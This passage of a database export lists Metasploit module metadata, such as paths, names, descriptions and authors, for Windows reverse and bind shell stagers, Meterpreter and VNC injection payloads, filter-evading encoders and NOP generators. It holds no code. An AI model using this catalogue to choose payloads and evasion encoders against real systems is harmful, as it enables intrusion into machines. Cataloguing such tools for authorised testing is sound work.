Injection), Reverse Ordinal TCP Stager (No NX or Win7)",300,"Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , spoonm " 2291,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp.rb","payload","windows/vncinject/reverse_tcp","payload/windows/vncinject/reverse_tcp","VNC Server (Reflective Injection), Reverse TCP Stager",300,"Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2292,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_allports.rb","payload","windows/vncinject/reverse_tcp_allports","payload/windows/vncinject/reverse_tcp_allports","VNC Server (Reflective Injection), Reverse All-Port TCP Stager",300,"Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2293,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_dns.rb","payload","windows/vncinject/reverse_tcp_dns","payload/windows/vncinject/reverse_tcp_dns","VNC Server (Reflective Injection), Reverse TCP Stager (DNS)",300,"Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2294,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4.rb","payload","windows/vncinject/reverse_tcp_rc4","payload/windows/vncinject/reverse_tcp_rc4","VNC Server (Reflective Injection), Reverse TCP Stager (RC4 stage encryption)",300,"Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , mihi, sf , skape " 2295,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb","payload","windows/vncinject/reverse_tcp_rc4_dns","payload/windows/vncinject/reverse_tcp_rc4_dns","VNC Server (Reflective Injection), Reverse TCP Stager (RC4 stage encryption DNS)",300,"Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","RageLtMan, hdm , mihi, sf , skape " 2296,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/x64/exec.rb","payload","windows/x64/exec","payload/windows/x64/exec","Windows x64 Execute Command",300,"Execute an arbitrary command (Windows x64)","Metasploit Framework License (BSD)","f",,,,,"t",,"sf " 2297,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/x64/loadlibrary.rb","payload","windows/x64/loadlibrary","payload/windows/x64/loadlibrary","Windows x64 LoadLibrary Path",300,"Load an arbitrary x64 library path","Metasploit Framework License (BSD)","f",,,,,"t",,"scriptjunkie, sf " 2298,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/x64/bind_tcp.rb","payload","windows/x64/meterpreter/bind_tcp","payload/windows/x64/meterpreter/bind_tcp","Windows x64 Meterpreter, Windows x64 Bind TCP Stager",300,"Listen for a connection (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf " 2299,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/x64/reverse_tcp.rb","payload","windows/x64/meterpreter/reverse_tcp","payload/windows/x64/meterpreter/reverse_tcp","Windows x64 Meterpreter, Windows x64 Reverse TCP Stager",300,"Connect back to the attacker (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf " 2300,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/x64/bind_tcp.rb","payload","windows/x64/shell/bind_tcp","payload/windows/x64/shell/bind_tcp","Windows x64 Command Shell, Windows x64 Bind TCP Stager",300,"Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf " 2301,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/x64/reverse_tcp.rb","payload","windows/x64/shell/reverse_tcp","payload/windows/x64/shell/reverse_tcp","Windows x64 Command Shell, Windows x64 Reverse TCP Stager",300,"Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"sf " 2302,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/x64/shell_bind_tcp.rb","payload","windows/x64/shell_bind_tcp","payload/windows/x64/shell_bind_tcp","Windows x64 Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell (Windows x64)","Metasploit Framework License (BSD)","f",,,,,"t",,"sf " 2303,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb","payload","windows/x64/shell_reverse_tcp","payload/windows/x64/shell_reverse_tcp","Windows x64 Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell (Windows x64)","Metasploit Framework License (BSD)","f",,,,,"t",,"sf " 2304,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/x64/bind_tcp.rb","payload","windows/x64/vncinject/bind_tcp","payload/windows/x64/vncinject/bind_tcp","Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager",300,"Listen for a connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf " 2305,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/x64/reverse_tcp.rb","payload","windows/x64/vncinject/reverse_tcp","payload/windows/x64/vncinject/reverse_tcp","Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager",300,"Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf " 2306,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/cmd/generic_sh.rb","encoder","cmd/generic_sh","encoder/cmd/generic_sh","Generic Shell Variable Substitution Command Encoder",400,"This encoder uses standard Bourne shell variable substitution tricks to avoid commonly restricted characters.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2307,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/cmd/ifs.rb","encoder","cmd/ifs","encoder/cmd/ifs","Generic ${IFS} Substitution Command Encoder",100,"This encoder uses standard Bourne shell variable substitution to avoid spaces without being overly fancy.","Metasploit Framework License (BSD)","f",,,,,"t",,"egypt " 2308,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/cmd/printf_php_mq.rb","encoder","cmd/printf_php_mq","encoder/cmd/printf_php_mq","printf(1) via PHP magic_quotes Utility Command Encoder",0,"This encoder uses the printf(1) utility to avoid restricted characters. Some shell variable substituion may also be used if needed symbols are blacklisted. Some characters are intentionally left unescaped since it is assummed that PHP with magic_quotes_gpc enabled will escape them during request handling.","Metasploit Framework License (BSD)","f",,,,,"t",,"jduck " 2309,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/generic/none.rb","encoder","generic/none","encoder/generic/none","The ""none"" Encoder",300,"This ""encoder"" does not transform the payload in any way.","Metasploit Framework License (BSD)","f",,,,,"t",,"spoonm " 2310,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/mipsbe/longxor.rb","encoder","mipsbe/longxor","encoder/mipsbe/longxor","XOR Encoder",300,"Mips Web server exploit friendly xor encoder","Metasploit Framework License (BSD)","f",,,,,"t",,"Julien Tinnes " 2311,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/mipsle/longxor.rb","encoder","mipsle/longxor","encoder/mipsle/longxor","XOR Encoder",300,"Mips Web server exploit friendly xor encoder","Metasploit Framework License (BSD)","f",,,,,"t",,"Julien Tinnes " 2312,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/php/base64.rb","encoder","php/base64","encoder/php/base64","PHP Base64 Encoder",500,"This encoder returns a base64 string encapsulated in eval(base64_decode()), increasing the size by a bit more than one third.","BSD License","f",,,,,"t",,"egypt " 2313,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/ppc/longxor.rb","encoder","ppc/longxor","encoder/ppc/longxor","PPC LongXOR Encoder",300,"This encoder is ghandi's PPC dword xor encoder with some size tweaks by HDM.","Metasploit Framework License (BSD)","f",,,,,"t",,"ddz , hdm " 2314,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/ppc/longxor_tag.rb","encoder","ppc/longxor_tag","encoder/ppc/longxor_tag","PPC LongXOR Encoder",300,"This encoder is ghandi's PPC dword xor encoder but uses a tag-based terminator rather than a length.","Metasploit Framework License (BSD)","f",,,,,"t",,"ddz , hdm " 2315,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/sparc/longxor_tag.rb","encoder","sparc/longxor_tag","encoder/sparc/longxor_tag","SPARC DWORD XOR Encoder",300,"This encoder is optyx's 48-byte SPARC encoder with some tweaks.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , optyx " 2316,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x64/xor.rb","encoder","x64/xor","encoder/x64/xor","XOR Encoder",300,"An x64 XOR encoder. Uses an 8 byte key and takes advantage of x64 relative addressing.","Metasploit Framework License (BSD)","f",,,,,"t",,"sf " 2317,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/alpha_mixed.rb","encoder","x86/alpha_mixed","encoder/x86/alpha_mixed","Alpha2 Alphanumeric Mixedcase Encoder",100,"Encodes payloads as alphanumeric mixedcase text. This encoder uses SkyLined's Alpha2 encoding suite.","BSD License","f",,,,,"t",,"pusscat , skylined " 2318,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/alpha_upper.rb","encoder","x86/alpha_upper","encoder/x86/alpha_upper","Alpha2 Alphanumeric Uppercase Encoder",100,"Encodes payloads as alphanumeric uppercase text. This encoder uses SkyLined's Alpha2 encoding suite.","BSD License","f",,,,,"t",,"pusscat , skylined " 2319,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/avoid_underscore_tolower.rb","encoder","x86/avoid_underscore_tolower","encoder/x86/avoid_underscore_tolower","Avoid underscore/tolower",0,"Underscore/tolower Safe Encoder used to exploit CVE-2012-2329. It is a modified version of the 'Avoid UTF8/tolower' encoder by skape. Please check the documentation of the skape encoder before using it. As the original, this encoder expects ECX pointing to the start of the encoded payload. Also BufferOffset must be provided if needed. The changes introduced are (1) avoid the use of the 0x5f byte (underscore) in because it is a badchar in the CVE-2012-2329 case and (2) optimize the transformation block, having into account more relaxed conditions about bad characters greater than 0x80.","Metasploit Framework License (BSD)","f",,,,,"t",,"juan vazquez , skape " 2320,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/avoid_utf8_tolower.rb","encoder","x86/avoid_utf8_tolower","encoder/x86/avoid_utf8_tolower","Avoid UTF8/tolower",0,"UTF8 Safe, tolower Safe Encoder","Metasploit Framework License (BSD)","f",,,,,"t",,"skape " 2321,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/bloxor.rb","encoder","x86/bloxor","encoder/x86/bloxor","BloXor - A Metamorphic Block Based XOR Encoder",0,"A Metamorphic Block Based XOR Encoder.","Metasploit Framework License (BSD)","f",,,,,"t",,"sf " 2322,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/call4_dword_xor.rb","encoder","x86/call4_dword_xor","encoder/x86/call4_dword_xor","Call+4 Dword XOR Encoder",300,"Call+4 Dword XOR Encoder","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , spoonm " 2323,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/context_cpuid.rb","encoder","x86/context_cpuid","encoder/x86/context_cpuid","CPUID-based Context Keyed Payload Encoder",0,"This is a Context-Keyed Payload Encoder based on CPUID and Shikata Ga Nai.","Metasploit Framework License (BSD)","f",,,,,"t",,"Dimitris Glynos" 2324,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/context_stat.rb","encoder","x86/context_stat","encoder/x86/context_stat","stat(2)-based Context Keyed Payload Encoder",0,"This is a Context-Keyed Payload Encoder based on stat(2) and Shikata Ga Nai.","Metasploit Framework License (BSD)","f",,,,,"t",,"Dimitris Glynos" 2325,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/context_time.rb","encoder","x86/context_time","encoder/x86/context_time","time(2)-based Context Keyed Payload Encoder",0,"This is a Context-Keyed Payload Encoder based on time(2) and Shikata Ga Nai.","Metasploit Framework License (BSD)","f",,,,,"t",,"Dimitris Glynos" 2326,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/countdown.rb","encoder","x86/countdown","encoder/x86/countdown","Single-byte XOR Countdown Encoder",300,"This encoder uses the length of the payload as a position-dependent encoder key to produce a small decoder stub.","Metasploit Framework License (BSD)","f",,,,,"t",,"vlad902 " 2327,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/fnstenv_mov.rb","encoder","x86/fnstenv_mov","encoder/x86/fnstenv_mov","Variable-length Fnstenv/mov Dword XOR Encoder",300,"This encoder uses a variable-length mov equivalent instruction with fnstenv for getip.","Metasploit Framework License (BSD)","f",,,,,"t",,"spoonm " 2328,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/jmp_call_additive.rb","encoder","x86/jmp_call_additive","encoder/x86/jmp_call_additive","Jump/Call XOR Additive Feedback Encoder",300,"Jump/Call XOR Additive Feedback","Metasploit Framework License (BSD)","f",,,,,"t",,"skape " 2329,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/nonalpha.rb","encoder","x86/nonalpha","encoder/x86/nonalpha","Non-Alpha Encoder",100,"Encodes payloads as non-alpha based bytes. This allows payloads to bypass both toupper() and tolower() calls, but will fail isalpha(). Table based design from Russel Sanford.","BSD License","f",,,,,"t",,"pusscat " 2330,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/nonupper.rb","encoder","x86/nonupper","encoder/x86/nonupper","Non-Upper Encoder",100,"Encodes payloads as non-alpha based bytes. This allows payloads to bypass tolower() calls, but will fail isalpha(). Table based design from Russel Sanford.","BSD License","f",,,,,"t",,"pusscat " 2331,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/shikata_ga_nai.rb","encoder","x86/shikata_ga_nai","encoder/x86/shikata_ga_nai","Polymorphic XOR Additive Feedback Encoder",600,"This encoder implements a polymorphic XOR additive feedback encoder. The decoder stub is generated based on dynamic instruction substitution and dynamic block ordering. Registers are also selected dynamically.","Metasploit Framework License (BSD)","f",,,,,"t",,"spoonm " 2332,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/single_static_bit.rb","encoder","x86/single_static_bit","encoder/x86/single_static_bit","Single Static Bit",0,"Static value for specific bit","Metasploit Framework License (BSD)","f",,,,,"t",,"jduck " 2333,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/unicode_mixed.rb","encoder","x86/unicode_mixed","encoder/x86/unicode_mixed","Alpha2 Alphanumeric Unicode Mixedcase Encoder",0,"Encodes payloads as unicode-safe mixedcase text. This encoder uses SkyLined's Alpha2 encoding suite.","BSD License","f",,,,,"t",,"pusscat , skylined " 2334,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/encoders/x86/unicode_upper.rb","encoder","x86/unicode_upper","encoder/x86/unicode_upper","Alpha2 Alphanumeric Unicode Uppercase Encoder",0,"Encodes payload as unicode-safe uppercase text. This encoder uses SkyLined's Alpha2 encoding suite.","BSD License","f",,,,,"t",,"pusscat , skylined " 2335,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/nops/armle/simple.rb","nop","armle/simple","nop/armle/simple","Simple",300,"Simple NOP generator","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2336,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/nops/php/generic.rb","nop","php/generic","nop/php/generic","PHP Nop Generator",300,"Generates harmless padding for PHP scripts","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2337,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/nops/ppc/simple.rb","nop","ppc/simple","nop/ppc/simple","Simple",300,"Simple NOP generator","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2338,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/nops/sparc/random.rb","nop","sparc/random","nop/sparc/random","SPARC NOP Generator",300,"SPARC NOP generator","Metasploit Framework License (BSD)","f",,,,,"t",,"vlad902 " 2339,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/nops/tty/generic.rb","nop","tty/generic","nop/tty/generic","TTY Nop Generator",300,"Generates harmless padding for TTY input","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2340,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/nops/x64/simple.rb","nop","x64/simple","nop/x64/simple","Simple",300,"An x64 single/multi byte NOP instruction generator.","Metasploit Framework License (BSD)","f",,,,,"t",,"sf " 2341,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/nops/x86/opty2.rb","nop","x86/opty2","nop/x86/opty2","Opty2",300,"Opty2 multi-byte NOP generator","Metasploit Framework License (BSD)","f",,,,,"t",,"optyx , spoonm " 2342,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/nops/x86/single_byte.rb","nop","x86/single_byte","nop/x86/single_byte","Single Byte",300,"Single-byte NOP generator","Metasploit Framework License (BSD)","f",,,,,"t",,"spoonm "